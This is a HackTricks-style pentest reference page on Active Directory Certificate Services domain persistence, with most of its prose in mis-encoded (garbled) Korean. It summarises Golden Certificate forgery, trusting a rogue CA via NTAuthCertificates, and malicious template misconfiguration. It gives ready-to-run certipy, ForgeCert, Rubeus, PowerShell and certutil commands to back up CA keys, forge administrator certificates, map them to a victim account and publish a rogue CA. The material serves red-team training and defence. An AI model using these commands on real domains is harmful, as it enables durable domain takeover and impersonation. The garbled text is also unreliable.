AD CS ๋„๋ฉ”์ธ ์ง€์†์„ฑ

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ

์ด ๋ฌธ์„œ๋Š” https://www.specterops.io/assets/resources/Certified_Pre-Owned.pdf ์—์„œ ๊ณต์œ ๋œ ๋„๋ฉ”์ธ ์ง€์†์„ฑ ๊ธฐ์ˆ ์˜ ์š”์•ฝ์ž…๋‹ˆ๋‹ค. ์ž์„ธํ•œ ๋‚ด์šฉ์€ ํ•ด๋‹น ๋ฌธ์„œ๋ฅผ ํ™•์ธํ•˜์„ธ์š”.

๋„๋‚œ๋‹นํ•œ CA ์ธ์ฆ์„œ๋ฅผ ์ด์šฉํ•œ ์ธ์ฆ์„œ ์œ„์กฐ (Golden Certificate) - DPERSIST1

์ธ์ฆ์„œ๊ฐ€ CA ์ธ์ฆ์„œ์ธ์ง€ ์–ด๋–ป๊ฒŒ ์•Œ ์ˆ˜ ์žˆ๋‚˜์š”?

๋‹ค์Œ ์กฐ๊ฑด๋“ค์ด ์ถฉ์กฑ๋˜๋ฉด ์ธ์ฆ์„œ๊ฐ€ CA ์ธ์ฆ์„œ์ž„์„ ํŒ๋‹จํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

  • ์ธ์ฆ์„œ๋Š” CA ์„œ๋ฒ„์— ์ €์žฅ๋˜์–ด ์žˆ์œผ๋ฉฐ, ๊ฐœ์ธ ํ‚ค๋Š” ๋จธ์‹ ์˜ DPAPI๋กœ ๋ณดํ˜ธ๋˜๊ฑฐ๋‚˜ ์šด์˜ ์ฒด์ œ๊ฐ€ ์ง€์›ํ•˜๋Š” ๊ฒฝ์šฐ TPM/HSM ๊ฐ™์€ ํ•˜๋“œ์›จ์–ด๋กœ ๋ณดํ˜ธ๋ฉ๋‹ˆ๋‹ค.
  • ์ธ์ฆ์„œ์˜ Issuer ๋ฐ Subject ํ•„๋“œ๊ฐ€ CA์˜ distinguished name๊ณผ ์ผ์น˜ํ•ฉ๋‹ˆ๋‹ค.
  • CA ์ธ์ฆ์„œ์—๋งŒ โ€œCA Versionโ€ ํ™•์žฅ(extension)์ด ์กด์žฌํ•ฉ๋‹ˆ๋‹ค.
  • ์ธ์ฆ์„œ์—๋Š” Extended Key Usage (EKU) ํ•„๋“œ๊ฐ€ ์—†์Šต๋‹ˆ๋‹ค.

์ด ์ธ์ฆ์„œ์˜ ๊ฐœ์ธ ํ‚ค๋ฅผ ์ถ”์ถœํ•˜๋ ค๋ฉด CA ์„œ๋ฒ„์—์„œ ์ œ๊ณต๋˜๋Š” GUI๋ฅผ ํ†ตํ•ด certsrv.msc ๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ•˜๋Š” ๊ฒƒ์ด ์ง€์›๋˜๋Š” ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค. ๊ทธ๋Ÿผ์—๋„ ๋ถˆ๊ตฌํ•˜๊ณ  ์ด ์ธ์ฆ์„œ๋Š” ์‹œ์Šคํ…œ์— ์ €์žฅ๋œ ๋‹ค๋ฅธ ์ธ์ฆ์„œ๋“ค๊ณผ ๊ตฌ๋ณ„๋˜์ง€ ์•Š์œผ๋ฏ€๋กœ, THEFT2 technique์™€ ๊ฐ™์€ ๋ฐฉ๋ฒ•์œผ๋กœ๋„ ์ถ”์ถœํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

์ธ์ฆ์„œ์™€ ๊ฐœ์ธ ํ‚ค๋Š” ๋˜ํ•œ Certipy๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ๋‹ค์Œ ๋ช…๋ น์œผ๋กœ ์–ป์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

certipy ca 'corp.local/administrator@ca.corp.local' -hashes :123123.. -backup

CA ์ธ์ฆ์„œ์™€ ํ•ด๋‹น ๊ฐœ์ธ ํ‚ค๋ฅผ .pfx ํ˜•์‹์œผ๋กœ ํ™•๋ณดํ•œ ํ›„, ForgeCert ๊ฐ™์€ ๋„๊ตฌ๋ฅผ ์‚ฌ์šฉํ•˜์—ฌ ์œ ํšจํ•œ ์ธ์ฆ์„œ๋ฅผ ์ƒ์„ฑํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค:

# Generating a new certificate with ForgeCert
ForgeCert.exe --CaCertPath ca.pfx --CaCertPassword Password123! --Subject "CN=User" --SubjectAltName localadmin@theshire.local --NewCertPath localadmin.pfx --NewCertPassword Password123!

# Generating a new certificate with certipy
certipy forge -ca-pfx CORP-DC-CA.pfx -upn administrator@corp.local -subject 'CN=Administrator,CN=Users,DC=CORP,DC=LOCAL'

# Authenticating using the new certificate with Rubeus
Rubeus.exe asktgt /user:localdomain /certificate:C:\ForgeCert\localadmin.pfx /password:Password123!

# Authenticating using the new certificate with certipy
certipy auth -pfx administrator_forged.pfx -dc-ip 172.16.126.128

Warning

์ธ์ฆ์„œ ์œ„์กฐ ๋Œ€์ƒ ์‚ฌ์šฉ์ž๋Š” ํ”„๋กœ์„ธ์Šค๊ฐ€ ์„ฑ๊ณตํ•˜๋ ค๋ฉด Active Directory์—์„œ ํ™œ์„ฑ ์ƒํƒœ์ด๋ฉฐ ์ธ์ฆํ•  ์ˆ˜ ์žˆ์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. krbtgt์™€ ๊ฐ™์€ ํŠน์ˆ˜ ๊ณ„์ •์— ๋Œ€ํ•œ ์ธ์ฆ์„œ ์œ„์กฐ๋Š” ํšจ๊ณผ๊ฐ€ ์—†์Šต๋‹ˆ๋‹ค.

์ด ์œ„์กฐ๋œ ์ธ์ฆ์„œ๋Š” ์ง€์ •๋œ ์ข…๋ฃŒ ๋‚ ์งœ๊นŒ์ง€ ๊ทธ๋ฆฌ๊ณ  ๋ฃจํŠธ CA ์ธ์ฆ์„œ๊ฐ€ ์œ ํšจํ•œ ํ•œ(๋ณดํ†ต 5๋…„์—์„œ 10+๋…„) ์œ ํšจํ•ฉ๋‹ˆ๋‹ค. ๋˜ํ•œ machines์— ๋Œ€ํ•ด์„œ๋„ ์œ ํšจํ•˜๋ฏ€๋กœ, S4U2Self์™€ ๊ฒฐํ•ฉํ•˜๋ฉด ๊ณต๊ฒฉ์ž๋Š” CA ์ธ์ฆ์„œ๊ฐ€ ์œ ํšจํ•œ ํ•œ ์–ด๋–ค ๋„๋ฉ”์ธ ๋จธ์‹ ์—์„œ๋“  ์ง€์†์„ฑ์„ ์œ ์ง€ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.
๋”์šฑ์ด, ์ด ๋ฐฉ๋ฒ•์œผ๋กœ ์ƒ์„ฑ๋œ ์ธ์ฆ์„œ๋“ค์€ CA๊ฐ€ ์ด๋ฅผ ์ธ์ง€ํ•˜์ง€ ๋ชปํ•˜๊ธฐ ๋•Œ๋ฌธ์— ํ๊ธฐ๋  ์ˆ˜ ์—†์Šต๋‹ˆ๋‹ค.

Strong Certificate Mapping Enforcement(2025+) ํ•˜์—์„œ์˜ ์šด์˜

2025๋…„ 2์›” 11์ผ ์ดํ›„(KB5014754 ๋ฐฐํฌ ํ›„)๋ถ€ํ„ฐ domain controllers๋Š” certificate mappings์— ๋Œ€ํ•ด ๊ธฐ๋ณธ์ ์œผ๋กœ Full Enforcement๋ฅผ ์ ์šฉํ•ฉ๋‹ˆ๋‹ค. ์‹ค๋ฌด์ ์œผ๋กœ ์ด๋Š” ์œ„์กฐ๋œ ์ธ์ฆ์„œ๊ฐ€ ๋‹ค์Œ ์ค‘ ํ•˜๋‚˜๋ฅผ ๋งŒ์กฑํ•ด์•ผ ํ•จ์„ ์˜๋ฏธํ•ฉ๋‹ˆ๋‹ค:

  • ํƒ€๊นƒ ๊ณ„์ •์— ๋Œ€ํ•œ ๊ฐ•ํ•œ ๋ฐ”์ธ๋”ฉ์„ ํฌํ•จํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค(์˜ˆ: SID security extension), ๋˜๋Š”
  • ๋Œ€์ƒ ๊ฐ์ฒด์˜ altSecurityIdentities ์†์„ฑ์— ๊ฐ•๋ ฅํ•˜๊ณ  ๋ช…์‹œ์ ์ธ ๋งคํ•‘์ด ์„ค์ •๋˜์–ด ์žˆ์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

์ง€์†์„ฑ์„ ํ™•๋ณดํ•˜๋Š” ์‹ ๋ขฐํ•  ์ˆ˜ ์žˆ๋Š” ์ ‘๊ทผ๋ฒ•์€ ๋„๋‚œ๋‹นํ•œ Enterprise CA์— ์ฒด์ธ๋œ ์œ„์กฐ ์ธ์ฆ์„œ๋ฅผ ๋ฐœํ–‰ํ•œ ๋‹ค์Œ ํ”ผํ•ด์ž principal์— ๊ฐ•๋ ฅํ•œ ๋ช…์‹œ์  ๋งคํ•‘์„ ์ถ”๊ฐ€ํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค:

# Example: map a forged cert to a target account using Issuer+Serial (strong mapping)
$Issuer  = 'DC=corp,DC=local,CN=CORP-DC-CA'           # reverse DN format expected by AD
$SerialR = '1200000000AC11000000002B'                  # serial in reversed byte order
$Map     = "X509:<I>$Issuer<SR>$SerialR"             # strong mapping format
Set-ADUser -Identity 'victim' -Add @{altSecurityIdentities=$Map}

์ฐธ๊ณ 

  • If you can craft forged certificates that include the SID security extension, those will map implicitly even under Full Enforcement. Otherwise, prefer explicit strong mappings. See account-persistence for more on explicit mappings.
  • Revocation does not help defenders here: forged certificates are unknown to the CA database and thus cannot be revoked.

Trusting Rogue CA Certificates - DPERSIST2

The NTAuthCertificates object is defined to contain one or more CA certificates within its cacertificate attribute, which Active Directory (AD) utilizes. The verification process by the domain controller involves checking the NTAuthCertificates object for an entry matching the CA specified in the Issuer field of the authenticating certificate. Authentication proceeds if a match is found.

A self-signed CA certificate can be added to the NTAuthCertificates object by an attacker, provided they have control over this AD object. Normally, only members of the Enterprise Admin group, along with Domain Admins or Administrators in the forest rootโ€™s domain, are granted permission to modify this object. They can edit the NTAuthCertificates object using certutil.exe with the command certutil.exe -dspublish -f C:\Temp\CERT.crt NTAuthCA, or by employing the PKI Health Tool.

Additional helpful commands for this technique:

# Add/remove and inspect the Enterprise NTAuth store
certutil -enterprise -f -AddStore NTAuth C:\Temp\CERT.crt
certutil -enterprise -viewstore NTAuth
certutil -enterprise -delstore NTAuth <Thumbprint>

# (Optional) publish into AD CA containers to improve chain building across the forest
certutil -dspublish -f C:\Temp\CERT.crt RootCA          # CN=Certification Authorities
certutil -dspublish -f C:\Temp\CERT.crt CA               # CN=AIA

์ด ๊ธฐ๋Šฅ์€ ForgeCert๋ฅผ ์ด์šฉํ•ด ๋™์ ์œผ๋กœ ์ธ์ฆ์„œ๋ฅผ ์ƒ์„ฑํ•˜๋Š” ์•ž์„œ ์„ค๋ช…ํ•œ ๋ฐฉ๋ฒ•๊ณผ ํ•จ๊ป˜ ์‚ฌ์šฉํ•  ๋•Œ ํŠนํžˆ ๊ด€๋ จ์„ฑ์ด ๋†’์Šต๋‹ˆ๋‹ค.

Post-2025 ๋งคํ•‘ ๊ณ ๋ ค์‚ฌํ•ญ: NTAuth์— rogue CA๋ฅผ ๋ฐฐ์น˜ํ•˜๋Š” ๊ฒƒ์€ ๋ฐœ๊ธ‰ CA์— ๋Œ€ํ•œ ์‹ ๋ขฐ๋งŒ ์„ค์ •ํ•ฉ๋‹ˆ๋‹ค. DC๊ฐ€ Full Enforcement ์ƒํƒœ์ผ ๋•Œ ๋กœ๊ทธ์˜จ์— leaf ์ธ์ฆ์„œ๋ฅผ ์‚ฌ์šฉํ•˜๋ ค๋ฉด, ํ•ด๋‹น leaf์—๋Š” SID security extension์ด ํฌํ•จ๋˜์–ด ์žˆ๊ฑฐ๋‚˜ ๋Œ€์ƒ ๊ฐ์ฒด์— ๊ฐ•๋ ฅํ•œ ๋ช…์‹œ์  ๋งคํ•‘(์˜ˆ: altSecurityIdentities์˜ Issuer+Serial)์ด ์žˆ์–ด์•ผ ํ•ฉ๋‹ˆ๋‹ค. ์ž์„ธํ•œ ๋‚ด์šฉ์€ AD CS Account Persistence๋ฅผ ์ฐธ์กฐํ•˜์„ธ์š”.

Malicious Misconfiguration - DPERSIST3

AD CS ๊ตฌ์„ฑ์š”์†Œ์˜ security descriptor ์ˆ˜์ •์„ ํ†ตํ•œ persistence ๊ธฐํšŒ๋Š” ๋งŽ์Šต๋‹ˆ๋‹ค. โ€œDomain Escalationโ€ ์„น์…˜์— ์„ค๋ช…๋œ ์ˆ˜์ •๋“ค์€ ๋„๋ฉ”์ธ์—์„œ ๊ถŒํ•œ์ด ์ƒ์Šน๋œ ๊ณต๊ฒฉ์ž๊ฐ€ ์•…์˜์ ์œผ๋กœ ๊ตฌํ˜„ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ์—ฌ๊ธฐ์—๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™์€ ๋ฏผ๊ฐํ•œ ๊ตฌ์„ฑ์š”์†Œ์— ๋Œ€ํ•œ โ€œcontrol rightsโ€(์˜ˆ: WriteOwner/WriteDACL/etc.) ์ถ”๊ฐ€๊ฐ€ ํฌํ•จ๋ฉ๋‹ˆ๋‹ค:

  • CA ์„œ๋ฒ„์˜ AD computer ๊ฐ์ฒด
  • CA ์„œ๋ฒ„์˜ RPC/DCOM ์„œ๋ฒ„
  • CN=Public Key Services,CN=Services,CN=Configuration,DC=<DOMAIN>,DC=<COM> ๋‚ด์˜ ๋ชจ๋“  ํ•˜์œ„ AD ๊ฐ์ฒด ๋˜๋Š” ์ปจํ…Œ์ด๋„ˆ(์˜ˆ: Certificate Templates ์ปจํ…Œ์ด๋„ˆ, Certification Authorities ์ปจํ…Œ์ด๋„ˆ, NTAuthCertificates ๊ฐ์ฒด ๋“ฑ)
  • ๊ธฐ๋ณธ์ ์œผ๋กœ ๋˜๋Š” ์กฐ์ง์— ์˜ํ•ด AD CS ์ œ์–ด ๊ถŒํ•œ์ด ์œ„์ž„๋œ AD ๊ทธ๋ฃน(์˜ˆ: ๋‚ด์žฅ๋œ Cert Publishers ๊ทธ๋ฃน ๋ฐ ํ•ด๋‹น ๋ฉค๋ฒ„)

์•…์˜์  ๊ตฌํ˜„์˜ ์˜ˆ๋กœ๋Š” ๋„๋ฉ”์ธ์—์„œ elevated permissions๋ฅผ ๊ฐ€์ง„ ๊ณต๊ฒฉ์ž๊ฐ€ ๊ธฐ๋ณธ User certificate template์— WriteOwner ๊ถŒํ•œ์„ ์ถ”๊ฐ€ํ•˜๊ณ , ๊ทธ ๊ถŒํ•œ์˜ ์ฃผ์ฒด(principal)๋ฅผ ์ž์‹ ์œผ๋กœ ์„ค์ •ํ•˜๋Š” ๊ฒฝ์šฐ๊ฐ€ ์žˆ์Šต๋‹ˆ๋‹ค. ์ด๋ฅผ ์•…์šฉํ•˜๋ ค๋ฉด ๊ณต๊ฒฉ์ž๋Š” ๋จผ์ € User ํ…œํ”Œ๋ฆฟ์˜ ์†Œ์œ ๊ถŒ์„ ์ž์‹ ์œผ๋กœ ๋ณ€๊ฒฝํ•ฉ๋‹ˆ๋‹ค. ๊ทธ ๋‹ค์Œ ํ…œํ”Œ๋ฆฟ์—์„œ **mspki-certificate-name-flag**๋ฅผ 1๋กœ ์„ค์ •ํ•˜์—ฌ **ENROLLEE_SUPPLIES_SUBJECT**๋ฅผ ํ™œ์„ฑํ™”ํ•˜๋ฉด, ์š”์ฒญ ์‹œ Subject Alternative Name์„ ์ œ๊ณตํ•  ์ˆ˜ ์žˆ๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. ์ดํ›„ ๊ณต๊ฒฉ์ž๋Š” ํ•ด๋‹น ํ…œํ”Œ๋ฆฟ์œผ๋กœ enrollํ•˜์—ฌ ๋Œ€์ฒด ์ด๋ฆ„์œผ๋กœ domain administrator ์ด๋ฆ„์„ ์„ ํƒํ•˜๊ณ , ํš๋“ํ•œ ์ธ์ฆ์„œ๋ฅผ DA๋กœ์„œ์˜ ์ธ์ฆ์— ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

๊ณต๊ฒฉ์ž๊ฐ€ ์žฅ๊ธฐ์ ์ธ ๋„๋ฉ”์ธ persistence๋ฅผ ์œ„ํ•ด ์„ค์ •ํ•  ์ˆ˜ ์žˆ๋Š” ์‹ค์šฉ์  ์˜ต์…˜๋“ค(์ „์ฒด ์„ธ๋ถ€์‚ฌํ•ญ ๋ฐ ํƒ์ง€ ๋ฐฉ๋ฒ•์€ AD CS Domain Escalation ์ฐธ์กฐ):

  • ์š”์ฒญ์ž์—๊ฒŒ์„œ SAN์„ ํ—ˆ์šฉํ•˜๋Š” CA ์ •์ฑ… ํ”Œ๋ž˜๊ทธ(์˜ˆ: EDITF_ATTRIBUTESUBJECTALTNAME2 ํ™œ์„ฑํ™”). ์ด๋Š” ESC1 ์œ ์‚ฌ ๊ฒฝ๋กœ๋ฅผ ๊ณ„์†ํ•ด์„œ ์•…์šฉ ๊ฐ€๋Šฅํ•˜๊ฒŒ ์œ ์ง€ํ•ฉ๋‹ˆ๋‹ค.
  • ์ธ์ฆ ๊ธฐ๋Šฅ ๋ฐœ๊ธ‰์„ ํ—ˆ์šฉํ•˜๋Š” ํ…œํ”Œ๋ฆฟ DACL ๋˜๋Š” ์„ค์ •(์˜ˆ: Client Authentication EKU ์ถ”๊ฐ€, CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT ํ™œ์„ฑํ™”).
  • ์ˆ˜๋น„์ž๊ฐ€ ์ •๋ฆฌ๋ฅผ ์‹œ๋„ํ•  ๊ฒฝ์šฐ rogue ๋ฐœ๊ธ‰์ž๋ฅผ ์ง€์†์ ์œผ๋กœ ์žฌ๋„์ž…ํ•˜๊ธฐ ์œ„ํ•ด NTAuthCertificates ๊ฐ์ฒด๋‚˜ CA ์ปจํ…Œ์ด๋„ˆ๋ฅผ ์ œ์–ด.

Tip

KB5014754 ์ดํ›„ ๊ฐ•ํ™”๋œ ํ™˜๊ฒฝ์—์„œ๋Š” ์ด๋Ÿฌํ•œ ์˜ค๊ตฌ์„ฑ(misconfigurations)์„ ๋ช…์‹œ์ ์ธ ๊ฐ•๋ ฅ ๋งคํ•‘(altSecurityIdentities)๊ณผ ๊ฒฐํ•ฉํ•˜๋ฉด, DC๊ฐ€ ๊ฐ•๋ ฅ ๋งคํ•‘์„ ์ ์šฉํ•  ๋•Œ์—๋„ ๋ฐœ๊ธ‰๋˜๊ฑฐ๋‚˜ ์œ„์กฐ๋œ ์ธ์ฆ์„œ๋ฅผ ๊ณ„์† ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

References

  • Microsoft KB5014754 โ€“ Windows ๋„๋ฉ”์ธ ์ปจํŠธ๋กค๋Ÿฌ์˜ ์ธ์ฆ์„œ ๊ธฐ๋ฐ˜ ์ธ์ฆ ๋ณ€๊ฒฝ์‚ฌํ•ญ(๊ฐ•ํ™” ์ผ์ • ๋ฐ ๊ฐ•๋ ฅ ๋งคํ•‘). https://support.microsoft.com/en-au/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16
  • Certipy โ€“ Command Reference and forge/auth usage. https://github.com/ly4k/Certipy/wiki/08-%E2%80%90-Command-Reference
  • 0xdf โ€“ HTB: Certificate (SeManageVolumePrivilege to exfil CA keys โ†’ Golden Certificate)

Tip

AWS ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ:HackTricks Training AWS Red Team Expert (ARTE)
GCP ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training GCP Red Team Expert (GRTE) Azure ํ•ดํ‚น ๋ฐฐ์šฐ๊ธฐ ๋ฐ ์—ฐ์Šตํ•˜๊ธฐ: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks ์ง€์›ํ•˜๊ธฐ